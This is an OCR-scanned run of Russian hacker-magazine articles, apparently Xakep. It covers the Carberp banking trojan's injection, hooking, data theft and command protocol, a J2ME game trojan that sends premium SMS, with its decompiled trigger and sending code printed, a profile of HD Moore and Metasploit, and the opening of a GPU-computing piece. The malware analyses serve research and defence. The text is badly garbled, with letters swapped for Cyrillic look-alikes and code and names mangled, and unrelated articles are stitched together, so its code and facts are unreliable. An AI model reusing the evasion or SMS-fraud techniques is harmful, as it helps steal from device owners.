Сначала происходит поиск РІО-процесса. Стоит отметить, что в 
программе заложено два способа поиска. Первый способ заклю- 
чается в последовательном вызове функций РіпбѴѴіпсІоѵѵ ("5беи_ 
ТгауѴѴпсІ", 0) и ОеіѴѴіпсІоѵѵТбгеасІРгосеззІсІ (бѴѴпб, &ісІ), таким 
образом, в переменной ісі должен появиться нужный РІО. Если 
же по какой-то причине функция вернула «ісІ=0», то происходит 
обыкновенный перебор процессов и поиск нужного. 

Когда заветный РІО найден, программа внедряется в 
ехріогег давно известным способом — ^ѵѵОрепРгосезз + 
ѴѴгіІеРгосеззМетогу. Также вредонос делает хук двух функций в 
захваченном процессе — МШиегуОігесІогуРіІе и МіРезитеТбгеасІ 
из библиотеки пІсНЕсНІ. Чтобы уйти от детекта некоторыми анти- 
руткитами (например, РооІкіШпбоокег), хук делается не совсем 
стандартным способом. Троян подменяет не адрес нужной функ- 
ции, а адрес функции КіРазіЗузІетСаІІ (см. рисунок). 

Так для чего же подменяются функции? МШиегуОігесІогуРіІе 
перебирает все файлы, находяидиеся в директории. Она вызы- 
вается почти во всех программах (в том числе в ехріогег и стсі) 
при обзоре каталогов файловой системы. Ее подмена необходима 
для того, чтобы скрыть факт присутствия файла. МіРезитеТбгеасІ 
вызывается ехріогег’ом при смене директории и при (!) запуске 
приложения. Таким образом, если ехріогег заражен, то при запу- 
ске любого приложения вредоносная «закладка» определяет РІО 
запускаемого процесса и инжектится в него, также подменяя 
вышеупомянутые функции. Легко понять, что при старте системы 
троян автоматически запускается, заражает ехріогег, а соответ- 
ственно и все порожденные им процессы. 

На этом заканчивается список средств заидиты, используемых 
СагЬегр’ом. Полный список средств заидиты, применяемый этим 
трояном, приведен в таблице 2. 

Начинка 

Разобравшись со всеми заидитными механизмами трояна, мы 
приступили к изучению вирусной начинки. Оказалось, что в нем 



имеет место вполне стандартный функционал похиидения пользо- 
вательских данных, сравнимый с функционалом того же ІВапк’а 
или Іеиз'а и дополненный неплохим протоколом обмена данных 
между компьютерами жертвы и злоумышленника. Собирая по 
всей системе пользовательские сертификаты, пароли к учетным 
записям и прочей ключевой информации, добытые с помоидью 
работаюидего кейлоггера и снятия скриншотов рабочего стола, 
вредонос упаковывает все найденное в саЬ-архив и готовит его к 
отправке. 

Общение с хозяином 

Теперь посмотрим на реализованный в трояне протокол обмена 
данными. Условно в нем можно выделить этап установки соеди- 
нения и непосредственно рабочий этап обмена информацией. 

Этап установки соединения 

1 — Зараженный компьютер: 

1 . Установка соединения с сервером 1. 

2 . Отправка строки ОЕТ-запросом, предусматривающей ука- 
зание параметров: 

• ирііте; 

• боѵѵпііпк; 

• ирііпк; 

• ІСІ (зашифрованная строка, содержащая информацию о 
зараженной системе); 

• зіаіразз (начальный пароль); 

• соттепі. 

Вот пример такого запроса: 

/ 5 'ба'б?ир'біте=<ѵа 11 >&сІоѵ\/п 1 іпк=<ѵа 12 >&ир 1 іпк=<ѵа 13 > 

&ісІ=<ѵа 14 >& 5 'ба'І;ра 55 =<ѵа 15 >&соттеп 1 :=<ѵа 16 > 

3 . Ожидание приема информации от сервера. 

2 - Оервер злоумышленника: 

О 
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Граф ИЗ ЮЕ проанализированной второй части нашего 
криптора 



1. Отправка информации зараженному компьютеру. Могут 
быть отправлены следующие коды: 

• ок; 

• Ьабразз; 

• зеззіоп: <№ сессии>. 

3 — Зараженный компьютер: 

1. Распознавание полученной от сервера информации: 

• ок — соединение установлено; 

• Ьабразз, зеззіоп — повторная передача начальной 
информации от сервера. 



Этап передачи данных 

1 — Зараженный компьютер: 

1. Отправка строки Р05Т-запросом на сервер 2, предусма- 
тривающей указание параметров: 

• относительного пути, по которому на сервере злоумыш- 
ленника будут располагаться переданные файлы; 

• зашифрованная строка, содержащая закодированную 
строку с информацией о системе и кодовое слово. 

Передаваемая строка может выглядеть так: 

1 1 раііасііп I 05В45905А93Р7О4В843О385ААЕ079АР1 1 0 | 0 
Азашифрованная следующим образом: 

а=е15е327а-Р46а915сіЬ0014а284с052787еа7сІ63с8с40Ы 
аЗс1са-РеабЬЬ8е707бЬ0-Рб601861783с1-р-Р7сЬса429еЬ76а47 
Шифрование строки сопровождается дополнением избыточ- 
ности. 

2. Отправка сформированного .саЬ-файла с похищенной 
информацией серверу 2. 

3. Периодически происходит проверка установленного 
соединения. Данное действие аналогично предыдущему, за 
исключением того, что передается строка: 

0 I сЬеск I 00000000000000000000000000000000 | 

2 — Сервер: 

1. На стороне сервера осуществляется расшифровка при- 
нятого сообщения. Отправка уведомления об успешном 
приеме проверочного пакета. 

2. Отправка информации зараженной машине. Вот что сер- 
вер может отправить в зависимости от версии троянца (см. 
таблицу 3). 

3 — Зараженный компьютер: 

1. Распознавание принятой информации (см. таблицу 4). 

Надо сказать, что передачу информации СагЬегр осуществля- 
ет грамотно: инициализация связи сопровождается зашитым в 
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Таблица 3. Информация, отправляемая трояну сервером, в зависимости от версии 
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Содержимое секции «,1ех(» 



троян паролем, состояние канала связи периодически проверя- 
ется специальными пакетами, передаваемая информация шифру- 
ется, а шифротекст при этом наполняется избыточностью. Более 
того, возможно удаленное управление зловредом — в разбирае- 
мой нами версии присутствовал функционал по разбору команд 
от удаленного сервера. Здесь вирусописатели предусмотрели 
возможность обновления вируса, возможность самоудаления и 
загрузки дополнительных модулей. Кстати, последние направле- 
ны на целевые банковские системы. Заполучить образец такого 
модуля нам, к сожалению, не удалось, но с высокой вероятностью 
в нем можно обнаружить механизм перехвата выполняемой кли- 
ентом транзакции и подмены страниц аутентификации на стра- 
ничках интернет-банкинга. 

Дополнительные возможности 

Дополнительную убойность троянцу добавляют специальные 
плагины, которые он загружает вдобавок к основному функцио- 
налу. На момент исследования у нас было три зашифрованных 
плагина с символичными именами тіпіаѵ.ріид, кіИаѵ.рІид и 
раззѵѵ.ріид (именно в таком виде их удалось достать с сервера, 
с которым СагЬегр взаимодействует). Потратив немного време- 
ни на исследование шифрованных файлов и написание к ним 
декриптора на языке руіЬоп, удалось выяснить, что содержи- 
мое этих плагинов соответствует их названию. Действительно, 
тіпіаѵ.ріид занимается устранением конкурентов — если на 
компьютере жертвы помимо СагЬегр’а присутствует другой злов- 
ред, например, тот же самый 2еиз, то последний безжалостно 
удаляется из системы. Плагин кіііаѵ.ріид нейтрализует работу 
антивирусных систем, ну а раззѵѵ.ріид способен перехватывать 
вводимые пользователем пароли. 

Заключение 

Итак, мы немного рассказали о заидитных трюках трояна, о 
весьма элегантном способе заражения других процессов, нако- 
нец, непосредственно о его вредоносном функционале. Налицо 
эволюция технологий сокрытия от антивирусных эвристик и 
сигнатур. К слову, на момент начала исследования далеко не все 
антивирусные продукты могли отнести файл к классу вредонос- 
ных. Поэтому надо держать руку на пульсе — уже сейчас некото- 
рые вирусные аналитики предполагают стремительное развитие 
СагЬегр’а. 
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сіехес 


сіоѵѵпіоасі 


Скачивает дополнительный РЕ-файл с удаленного сервера и 
производит его запуск 


кіІІЬоі 


кіііизег 


Удаляет трояна из системы 


зІаіІзЬ 


ІоасІсІІІ 


Скачивает дополнительную библиотеку с плагином, которая 
подгружается в контекстную память троянского процесса 




дгаЬЬег 


Осуществляет сбор различных данных из системы 



Таблица 4. Распознавание принятой ин(Д)орллации 
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Рис. 1. 
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ПОД МИКРОСКОПОМ 

Рассматриваем «эротический» ^2МЕ-зловред 
во всех интимных подробностях 
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О Во всех предыдущих статьях из этой рубрики совсем не 
упоминались мобильные зловреды. Однако они существуют и, 
вопреки расхожему мнению, наносят неплохой урон кошельку 
пользователей. Поэтому в этой статье я разберу троянца для 
мобильных телефонов, маскирующегося под игру эротического 
содержания. 



Итак, подопытный - зловред под ^аѵа 2 Місго Есііііоп и2МЕ). Напомню 
читателям, что именно эту платформу для запуска приложений 
использует подавляющее большинство обычных мобильных теле- 
фонов (это те, которые НЕ смартфоны :)). Ее популярность более чем 
высока. Прежде чем начать разбор непосредственно файлов, я решил 
запустить зловред под эмулятором 5]Ьоу. Вот как будет выглядеть 
экран реального мобильного телефона сразу после запуска сэмпла 
(см. рис. 1 ). 

Как мы видим - это приложение позиционирует себя как игра. При 
этом пользователю любезно сообщается о факте содержания эроти- 
ческого контента. Конечно же, все это сделано исключительно для 
отвлечения внимания. А теперь - прочитаем правила игры (выдержка, 
орфография оригинала сохранена): 

«Это уникальная эротическая игра на ваш мобильный^ которая 
не имеет аналогов. Цель игры - нужно чем быстрей^ тем лучше 
раскрыть мозаику из цветных квадратов^ для того что бы 
увидеть спрятанную за ней картинку эротического содержания. 
Для уничтожения квадратов на экране Вам необходимо нажимать 
кнопку «Жми»». 

Вроде бы, ничего особенного - игра как игра. Но подождите, что там 
еще написано (выдержка, орфография опять-таки сохранены): 

«Данная программа изначально создана для регистрации^ 
которая открывают вам доступ к платному закрытому архиву 



эротических загрузок^ которые доступны лицам с 18 и лет 
и более. Саму программу Вы качаете бесплатно^ оплата 
происходит только за трафик по тарифу вашего оператора^ а 
за отправленное сообщение платите^ Внимание стоимость смс 
сообщений отправку которых запросит приложение состовляет: 
на номера 5370 ~10.31$ (15 дней)^ 5373 ~4.57$ (7 дней)^ 

7250 ~3.64$ (3 дня) т.е текст: «скачать бесплатно» на сайте 
касается только закачки приложения^ а за сообщения которое 
отсылает приложение^ вы платите. Приложение запросит 
отправку бшб! ! ! Чтобы зарегистрироваться в закрытом 
эротическом архиве^ Вы нажимаете «Да». Достаточно нажать 
один раз^ нажмете 2 раза снимут со счета^ как за 2 бшб^ и если 
нажмете 3 раза^ то сумму снимут 3 раза соотвественно. В слу- 
чае если Вы отправите 3 смс подряд^ то Вы получаете дополни- 
тельную неделю доступа бесплатно! ... » 

Так что же получается? Это не игра, а программа для получения 
доступа к платному контенту?! Кажется, что бояться вроде бы нече- 
го, так как ОС обязательно спрашивает у пользователя, согласен ли 
он отправить СМС. Но здесь злоумышленники немного схитрили. 
Суть игры заключается в том, что нужно очень быстро кликать на 
кнопку «жми», чтобы успеть открыть картинку. В определенный 
момент игры появляется подтверждение об отправке СМС, но 
увлеченный игрок так рьяно жмет на кнопку «жми», что попутно 
нажимает и кнопку «согласен». Сразу после этого с его счета неза- 
медлительно списывается энное количество денег. 
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Как это работает? 

А теперь - о том, как это работает изнутри. Программы под эту плат- 
форму выполнены в виде ^АР-файлов. Последние представляют 
собой обычный 21Р-архив, который можно распаковать. После рас- 
паковки мы увидим «файлы», которые используются приложением. 
Исполнение ^2МЕ-программы начинается с запуска «тісііеі.сіазз». 
Файлы «.сіазз» - это скомпилированный код ^аѵа. Можно провести 
аналогию с файлами, содержащими код на С/С++: «.с’7”.срр» компи- 
лируются в «.об]», ^аѵа сіазз’ы можно декомпилировать, например, 
при помощи ^А^. Так я и поступил. Да, у этого зловреда, помимо 
«тісІІеТсІазз», присутствовали еще и другие сіазз’ы, с которыми я 
поступил аналогично. 

Первое, что бросилось в глаза - функция зепсІМехіЗппз. Название, 
безусловно, говорящее. До этого я говорил, что СМС отправляется не 
сразу, а в определенные моменты игры. Я решил выяснить, как же это 
реализовано. Сама функция вызывается в тісііеі. сіазз следующим 
образом: 

ІТ (е_Ьоо1еап_Ис1) 

{ 

е_Ьоо1еап_Ис1 = -Раізе; 

5епс1Мех1;5т5(); 

} 

Из кода видно, что отправка вызывается только в случае, когда буле- 
вая переменная «е_ЬооІеап_[ІсІ» принимает значение «Ігие». Это про- 
исходит только в одном месте в коде: 

іТ(і == Ь.Ь && тосіе > 4 && тосіе < 6) 

{ 

е.а(е.Т, е.§); 
іТ(Ь.е > 1) 

{ 

ыІіі1е(Ь.а_іп1;_аггау2сІ_5І;а1;іс_ПсІ[гХ] [гУ] == 0) 

{ 

пех1:Х(); 

пех1:У(); 

} 

Ь.а_іп1;_аггау2сІ_5І:а1;іс_11сІ[гХ] [гУ] = 0; 

Ь.е--; 

с_іп1;_ПсІ = 100 - Ь.-Р * Ь.е; 
і-р(с_іп1:_ПсІ > сІ_іп1:_ПсІ) 

{ 

е_Ьоо1еап_Пс1 = 1;гие; 
сІ_іп1;_ЛсІ = сІ_іп1;_ПсІ + 11; 

} 

пех1;У(); 

геііигп; 

} еізе { 

а_Ь_11сI.а(сI.а^ пиіі); 
а_Ь_ПсІ.Ь( "Поздравляем! "); 
а_Ь_ПсІ . а (е_заѵа_1ап§_51;гіп§_ПсІ ) ; 
е.а(е.§, 0); 

а_Ь_ИсІ . зегѵісеКераіпІіБ ( ) ; 

а_1оп§_ПсІ = 5у5І:ет.сиггеп1;ТітеМі11І5(); 

тосіе = 6; 

с_Ьоо1еап_ПсІ = 1;гие; 
геТигп; 

} 

} 

Поскольку исходный коду меня, увы, отсутствует, то о назначении всех 
переменных приходится догадываться из контекста. Этот фрагмент 



кода отвечает за обработку пользовательского нажатия по кнопке 
«жми». Судя по всему, «Ь.е» - это количество оставшихся квадра- 
тов в игре. Если их не осталось, то будет рисоваться поздравление: 
«а_Ь_1'Іб.Ь(«Поздравляем!»):». А если они еще остались, то количество 
квадратов уменьшится на единицу: Ь.е--;, и будет произведено даль- 
нейшее рисование «бегающего» элемента. Как видно из кода, булева 
«е_ЬооІеап_[И», которая разрешит отправку 5М5, будет выставляться 
только при определенном условии: с_іпМШ > б_іпМШ. Это условие 
будет выполняться ближе к концу, когда «Ь.е» станет очень малень- 
ким, а «с_іпМІсІ», соответственно, большим: с_іп1;_11сі = 100 - Ь.-Р 
* Ь.е. 

Теперь обратимся непосредственно к коду функции зепбМехіЭМЭ 
(фрагмент): 

51:гіп§ 5І = Ь_]аѵа_1ап§_51;гіп§_ПсІ; 

51;гіп§ 5 = с_]аѵа_1ап§_51;гіп§_Р1сІ; 

с с1 = а_с_Р1сІ; 

5у5І;ет.§с(); 

і-р(с1.а_]аѵа_1ап§_ТЬгеасІ_ПсІ == пиіі) 

{ 

с1.а_Ьоо1еап_Р1сІ = -Раізе; 
с1.а_]аѵа_1ап§_51;гіп§_Р1сІ = 5І; 
сІ.Ь = "5т5://" + 5; 

с1.а_]"аѵа_1ап§_ТЬгеасІ_Р1сІ = пеы ТЬгеасІ(сІ); 
с1 . а_]'аѵа_1ап§_ТЬгеасІ_Р1сІ . 5І:аг1:( ) ; 

} 

■ргу 

{ 

ТЬгеасІ.5Іеер(3001); 

} 

са1;сЬ(Ехсер1;іоп _ех) { } 

Здесь происходит заполнение полей объекта «с1». Можно понять, что 
в строке «3» содержится номер, куда следует отправить 5М5, а в стро- 
ке «з1» содержится текст отправки. После того, как поля объекта ста- 
новятся заполненными, создается новый поток, которому в качестве 
параметра передается «с1». Обратимся к этому классу: 

Ме55а§еСоппес1:іоп те55а§есоппес1:іоп; 

5у5І;ет.§с(); 

те55а§есоппес1;іоп = пиіі; 

Тех1;Ме55а§е 1;ех1;те55а§е; 

(1;ех1;те55а§е = (Тех1:Ме55а§е) 

(те55а§есоппес1:іоп = (Ме55а§еСоппес1:іоп)Соппес1;ог.ореп(Ь)) . 
пеыМе55а§е("1:ех1:")) .5е1;АсІсІге55(Ь); 

1;ех1;те55а§е.5е1;Рау1оасІТех1:(а_заѵа_1ап§_51;гіп§_Р1сІ); 

те55а§есоппес1;іоп . зепсі (1;ех1;те55а§е) ; 

Я специально вырезал только тот код, который отвечает за отправ- 
ку сообщения, чтобы не загромождать статью. Мои предположения 
оказались верными. Так, текст сообщения содержится в строке 
«а_)аѵа_іа п д_5ігі пд_[И » : 1;ех1;те5 5а§е . зеІіРауІоасІТ ех1; ( а_д а ѵа_ 
1ап§_51;гіп§_11сІ);. А номер, куда произведена отправка в пере- 
менной «Ь»: (1:ех1;те55а§е = (Тех1;Ме55а§е) (те55а§есоппес1:іоп = 
(Ме55а§еСоппес1:іоп)Соппес1;ог.ореп(Ь) ) .пеыМе55а§е("1:ех1:")) . 
5е1;АсІсІге55(Ь);. Сама же отправка реализуется посредством следую- 
щего вызова: теззадесоппесііоп.зепб(іехітеззаде);. 

Заключение 

Вот и все - мы описали весь «полезный» функционал этой игры- 
трояна. Оказалось, что любители сомнительного контента могут легко 
попасться на элементарные уловки злоумышленников. Стоит отметить, 
что сам троянец выполнен достаточно качественно: по-видимому, на 
его разработку ушло не так мало времени. Но, что радует, - его разбор 
оказался совсем несложным. ^ 
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СЦЕНА 



■ ■ Мария «Міі^гіи» Нефедова (ті^гііігагеаі. хакер. ги) 




О Меіазріоіі и его создателе 

О На сегодня Эйч Ди Мур (НО Мооге) - один из наиболее известных 
специалистов в области информационной безопасности на планете. 
Уже в начале 2000-х на сайте известнейшей хак-конференции НІТВ 
можно было увидеть анонс, гласивший: «У нас будет еще один спикер 
- Эйч Ди Мур. Если ты не знаешь, кто зто, значит ты вообще не хакер, 
и тебе нужно как можно быстрее прочитать его биографию!». А ведь 
самому Муру на тот момент было всего 22 года. 



Начало карьеры 

Родился наш герой в 1981 году в 
Соединенных Штатах звездно-полосатой 
Америки. Кстати, интересный факт — НО 
Мооге, это не псевдоним. Дело в том, что 
первое имя Мура — Эйч (одна буква «Н», 
серьезно), а второе начинается на «О», вот и 
получаются инициалы. 

В юности Мур успел не раз сменить школу, 
так как из учебных заведений его попро- 
сту выгоняли за неуспеваемость. Если 
посмотреть на биографии других видных 
ІТ-деятелей, становится ясно, что подобная 
ситуация в этой среде едва ли не норма. 
Таким людям зачастую бывает скучно учить- 
ся — множество дисциплин они считают 
для себя ненужными и даже не пытаются 
вникать в них. У Мура была схожая про- 
блема. Шанс раскрыться представился ему 
лишь в не совсем обычном учебном заве- 
дении города Остин (штат Техас). Частная 
школа Гонзало Гарза работала (и по сей день 
работает) с подростками, которые по тем 
или иным причинам не могут найти себя и 
состояться в рамках привычной нам систе- 
мы. Именно там Эйч Ди отыскал свое место, 
а учителя гордо называли его компьютерным 
гением. 

Доподлинно неизвестно, в каком именно 
возрасте Мур заинтересовался поиском 
багов и уязвимостей, везде, где их только 
можно найти. Зато известно, что во время 
учебы в Гарза, будучи подростком 17 лет от 
роду, он уже сумел обнаружить серьезную 
проблему в армейской программе 5НА00ѴѴ 
(Эесопсіагу Неигізбс Апаіузіз Ьг □еі'епзіѵе 



Опііпе ѴѴагІ'аге). Мур не только предложил 
решение найденной проблемы, но даже 
проконсультировал по данному вопросу 
Агентство Национальной Безопасности. 
Поправки Мура приняли, в софт внесли 
соответствуюідие изменения. 

В тот же период времени он обнаружил 
серьезную дыру в почтовом сервисе УаЬоо. 
Как истинный ѵѵЫіе ба! Эйч Ди сообідил о 
дырке в Уабоо и продемонстрировал одному 
из сотрудников компании, как при помоіди 
этой уязвимости можно пробраться в систему 
и прочитать чужую почту. Все было принято к 
сведению и исправлено. 

Неудивительно, что после такого Мура 
заметили, и уже в столь юном возрасте он 
начал сотрудничать с Сотриіег Эсіепсез 
Согрогаііоп и Армией США на контрактной 
основе. Сам Эйч Ди признается, что ему 
всегда нравилось ломать и разбирать все 
подряд, и, по сути, он до сих пор занимается 
именно этим, просто используя для этого 
более продвинутые и автоматизированные 
методы. 

В последуюідие годы Мур продолжал совер- 
шенствоваться в нелегком деле тестов 
на проникновение, поиска уязвимостей и 
создания эксплоитов. Именно так, в про- 
цессе контрактной, фрилансерской работы, и 
родилось его самое известное (но не един- 
ственное) детиіде — Меіазріоіі;. Если ты не 
знаешь, что это такое, то этот журнал, навер- 
ное, попал к тебе в руки по ошибке, и ты, как 
писали парни с НІТВ, «не хакер» :). Впрочем, 
восполнять пробелы в знаниях никогда не 
поздно, так что позволь все же привести 
короткую справку. 



Проект Меіазріоіі; появился на свет в 2003 
году, и создателем его первой версии 
выступал лично Мур. Исходно он затевал 
это исключительно для себя и ради соб- 
ственного удобства, но впоследствии идея 
развилась в серьезный бизнес, а Меіазріоіі; 
Егатеѵѵогк стал одним из наиболее извест- 
ных продуктов в своей области. Это закон- 
ченная среда для создания, тестирования и 
использования кода эксплоитов. Она обеспе- 
чивает надежную платформу для испытаний 
на проникновение, разработки шеллкодов и 
исследования уязвимостей. Помимо прочего 
проект включает в себя базу опкодов, архив 
шеллкодов и информацию по исследованиям 
компьютерной безопасности. Официальная 
страница Мура ( бирУ/сІіаіІаІоІ'І'епзе.пеІ: ) сове- 
тует относительно Меіазріоіі; Егаппеѵѵогк бук- 
вально следуюідее: «Профессионалы в обла- 
сти сетевой безопасности могут использо- 
вать Меіазріоіі; для проведения пен-тестов, 
системные администраторы — для проверки 
установленных патчей, производители — для 
регрессивного тестирования, исследователи 
в сфере ИБ со всего мира тоже наверняка 
сумеют найти Меіазріоіі; применение». 
Меіазріоіі; способен функционировать прак- 
тически на любой платформе, привязки к 
чему-либо конкретному у него нет. По при- 
знанию Мура, самой экзотичной системой, 
на которой когда-либо запускали его про- 
дукт, были наручные часы с какой-то хитрой 
модификацией Ыпих на борту. Такими извра- 
ідениями занимался один участник конфе- 
ренции ЭОПРСЕ в Бостоне. 

Первая версия «Метасплоита» была написа- 
на на Регі и содержала псевдографический 
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Эйч Ди ЛЛур собственной персоной 



интерфейс на базе сигзез. Впоследствии, в 
2006 году, когда к Эйч Ди присоединились 
другие разработчики, была основана компа- 
ния Меіазріоіі; НС, и творение Мура почти 



полностью переписали на РиЬу (с некото- 
рыми частями на ассемблере, РуіЬоп и С). 
Словом, это своеобразное СЕОО для хакеров, 
скрипткидисов, тестеров и примкнувших к 
ним сограждан. 

МеІазрІоіІ и не только 

Однако неизвестно, как могла бы сло- 
житься карьера Мура и судьба проекта 
Меіазріоіі;, если бы Эйч Ди в 2005 году не 
повезло найти себе понимаюідего работо- 



дателя. Таковым для него стала компания 
ВгеакіпдРоіпІ;, по сей день занимаюідаяся 
вопросами безопасности в киберпростран- 
стве. Умные руководители ВгеакіпдРоіпІ; 



решили, что побочные проекты Мура не 
только не вредны, но и полезны компании, 
так как помогают улучшить качество их соб- 
ственной продукции и заслужить больший 
кредит доверия у клиентов. В целом, все 
так и вышло. Эйч Ди на протяжении 4 лет 
занимал в компании должность директора 
подразделения по исследованиям в сфере 
безопасности, «Метасплоит» развивался, 
продукция ВгеакіпдРоіпІ; тоже. 

В те годы на рынке информационной 



безопасности, по словам Мура, царила 
«великая депрессия». Многие из тех, кто 
раньше открыто публиковали информа- 
цию и с радостью делились ею, находили 
себе работу, или напротив — бросали это 
занятие. Частные компании, в свою оче- 
редь, все чаіде стали занимать позицию: 

«А зачем мы будем делиться со всеми 
этой инфой, если мы может продать ее в 
іВеІ'епзе?». Идея же Меіазріоіі, напротив, 
состояла в разработке инструментария и 
фреймворка для быстрого создания экс- 
плоитов, так сказать, для всех и каждого. 

В этом вопросе Муру и его коллегам, в 
известной степени, повезло — в то же 
самое время понемногу начала возрастать 
информированность людей о необходимо- 
сти такой простой веіди, как пен-тестинг, а 
в данной области инструменты подобные 
Меіазріоіі просто необходимы. Весьма 
интересно и то, что Мур всегда смеялся и 
продолжает смеяться над теми, кто полага- 
ет, что после обнародования уязвимости (и 
тем более эксплоита), обязательно случится 
«что-то плохое». Он искренне считает, что 
эксплоиты, а также информация о багах и 



«В последующие годы Мур продолжал 
совершенствоваться в нелегком деле 
тестов на проникновение, поиска 
уязвимостей и создания эксплоитов» 
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ЛЛеІазрІоіІ для профессионалов 



дырках должны быть общедоступны, ведь это, напротив, помогает 
безопасникам в их работе. Разумеется, здесь нужно заметить, что 
публиковать такие данные Мур считает возможным лишь после 
того, как о них оповещен производитель софта и СЕРТ. 

Лишний раз востребованность проекта подтвердилась в 2009 году, 
когда Меіазріоіі; был приобретен фирмой РарібУ, занимающейся 
управлением уязвимостями. Подробности этой сделки неизвестны, 
но Эйч Ди Мур покинул ВгеакіпдРоіпІ;, занял в РарібУ кресло руко- 
водителя службы безопасности, одновременно оставаясь и главным 
архитектором «Метасплоита». 

После покупки компании многие ожидали изменений к худшему и 
как минимум тотальной коммерциализации, но этого не произошло. 
Меіазріоіі; Ргатеѵѵогк по-прежнему бесплатен, хотя и появилась 
платная версия Меіазріоіі; Ехргезз, лицензия на которую стоит 
$3000 в год, а также Меіазріоіі; Рго, который распространяется 
среди партнеров компании. Кстати, незадолго до слияния, а именно 
в 2008 году, лицензия Меіазріоіі; Ргатеѵѵогк 
была сменена с проприетарной на В5П. Мур 
по сей день подчеркивает во всех интервью, 
что проект был, есть и останется ореп-зоигсе. 

Для Мура и его детища это слияние стало 
переходом на новый, уже совсем серьезный 
уровень. Меіазріоіі; укрепил свои позиции, 
отчасти монетизировался и на сегодня явля- 
ется одним из наиболее известных и востре- 
бованных инструментариев в своем роде. В 
РарібУ, которая теперь управляет проектом, за 
последние годы было вложено 9 миллионов долларов инвестиций 
со стороны известных в Кремниевой долине венчурных фондов. Это 
явно свидетельствует о том, что аналитики и бизнесмены с опти- 
мизмом смотрят на будущее МеІазрІоіЕ С финансами, кстати, связан 
еще один забавный факт. Мур не раз признавал в интервью, что 
«Метасплоит» нашел отклик и у андеграунда компьютерного мира, 
где он многим полюбился. Раньше, в начале и середине 2000-х, 
для команды проекта было вполне нормально получить $5 000 с 
неизвестного российского РауРаІ-аккаунта в виде пожертвования. 
На контакт такие анонимные благодетели идти не желали, на все 
вопросы отвечали, что им ничего не нужно, а деньги были «просто 
так, наслаждайтесь». 



В 2010 году РарібУ и компания 5АМ5 договорились о сотрудни- 
честве и открыли курсы по обучению работе с инфраструктурой 
Меіазріоіі; Ргатеѵѵогк. Обучение доступно в любых форматах: 
путем личного общения с инструктором, общения в реальном вре- 
мени через интернет или даже в виде самостоятельного онлайн- 
обучения. Но выше уже упоминалось, что «Метасплоит» — не един- 
ственное, что вышло из-под клавиатуры Зйч Ди. Это действительно 
так, хотя остальные его продукты тоже направлены на приносящее 
пользу разрушение :). 

К примеру, в 2006 году Мур сначала объявил и провел «Месяц 
браузерных багов», в ходе которого публиковал по эксплоиту к 
популярным браузерам каждый день, а затем, подытоживая, выпу- 
стил утилиту АхМап. Программа проводит аудит установленных в 
системе АсІіѵеХ и формирует список найденных уязвимостей. На 
момент релиза с ее помощью можно было обнаружить практически 
все уязвимости, связанные с этой технологией. 



Еще один хороший образчик творчества Мура — ѴѴагѴОХ, это не 
что иное, как инструмент для старого доброго ѵѵаг-сііаііпд. Она ори- 
ентирована на аудит телефонных линий, способна обнаруживать 
мини-АТС, тональные сигналы готовности, голосовую почту, фак- 
симильные аппараты и другие виды телефонных соединений. С ее 
помощью можно за 8 часов просканировать до 10 000 телефонных 
номеров. ѴѴагѴОХ умеет и записывать и архивировать аудиопоток. 
Если на другом конце провода кто-то возьмет трубку, ѴѴагѴОХ это 
обнаружит и начнет запись любого типа аудиосигнала. Прога, 
разумеется, предназначена для исследовательских целей, инвен- 
таризации и проверки безопасности телефонных линий, а не для 
того, о чем ты сейчас подумал. ^ 



«МеІазрІоІІ Ргатеѵѵогк по-прежнему 
бесплатен, хотя и появилась платная 
версия МеІазрІоіІ Ехрге$$, лицензия на 
которую стоит $3000 в год» 
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СУПЕРКОМПЬЮТЕР 
ИЗ ВИДЕОКАРТЫ 

Задействуем возможнош 6РІІ для ускорения софта 

@ Сегодня новости об использовании графических процессоров для 
общих вычислений можно услышать на каждом углу. Такие слова, 
как СІША, Зігеат и ОрепСІ, за каких-то два года стали чуть ли не 
самыми цитируемыми в айтишном интернете. Однако, что значат 
зти слова, и что несут стоящие за ними технологии, известно дале- 
ко не каждому. А для линуксоидов, привыкших «быть в пролете», 
так и вообще все зто видится темным лесом. 



Предисловие 

В этой статье мы попытаемся разобраться, зачем нужна технология 
ОРОРУ (Оепегаі-ригрозе дгарЫсз ргосеззіпд ипііз, Графический про- 
цессор общего назначения) и все связанные с ней реализацииот кон- 
кретных производителей. Узнаем, почему эта технология имеет очень 
узкую сферу применения, в которую подавляющее большинство софта 
не попадаете принципе, и конечноже, попытаемся извлечьиз всего 
этого выгоду в виде существенных приростов производительности в 
таких задачах, как шифрование, подбор паролей, работа с мультимедиа 
и архивирование. 



Рождение ОРСРІІ 

Мы все привыкли думать, что единственным компонентом компа, 
способным выполнять любой код, который ему прикажут, являет- 
ся центральный процессор. Долгое время почти все массовые ПК 
оснащалисьединственным процессором, который занимался всеми 
мыслимыми расчетами, включая код операционной системы, всего 
нашего софта и вирусов. 

Позже появились многоядерные процессоры и многопроцессорные 
системы, в которыхтаких компонентов было несколько. Зто позволило 
машинам выполнять несколько задач одновременно, а общая (теоре- 
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Так выглядит фрагмент реализации алгоритма 
АЕ5 на ОрепСІ 



КОРУ или ядро Ыпих, уско- 
ренное ОРУ 



Исследователи из университета Юты разработали 
систему КОРУ [ собе.аооаіе.сот/р/кари/ ). позволяющую 
выполнять некоторые функции ядра Уіпих на 
графическом процессоре с помощью фреймворка 
СУПА. Для выполнения этой задачи используется 
модифицированное ядро Ыпих и специальный демон, 
который работает в пространстве пользователя, слушает 
запросы ядра и передает их драйверу видеокарты с 
помощью библиотеки СУОА. Интересно, что несмотря 
на существенный оверхед, который создает та кая 
архитектура, авторам КОРУ удалось создать реализацию 
алгоритма АЕ5, который поднимает скорость 
шифрования файловой системы еСгурІі'з в 6 раз. 

тическая) производительность системы поднялась ровно 
во столько раз, сколько ядер былоустановлено в машине. 
Однако оказалось, что производить и конструировать 
многоядерные процессоры слишком сложно и дорого. В 
каждом ядре приходилось размещать полноценный про- 
цессор сложной и запутанной х86-архитектуры, со своим 
(довольно объемным) кэшем, конвейером инструкций, бло- 
ками 88Е, множеством блоков, выполняющих оптимиза- 
ции ит.д. ит.п. Поэтому процесс наращивания количества 
ядер существенно затормозился, и белыеуниверситетские 
халаты, которым два или четыре ядра было явно мало, 
нашли способ задействовать для своих научных расчетов 
другие вычислительные мощности, которых было в достат- 
ке на видеокарте (в результате даже появился инструмент 
ВгоокОРУ, эмулирующий дополнительный процессор с 
помощью вызовов функций ВігесіХи ОрепОЕ). 

Графические процессоры, лишенные многих недостатков 
центрального процессора, оказалисьотличной и очень 
быстрой счетной машинкой, и совсем скоро к наработкам 
ученыхумов начали присматриваться сами производители 
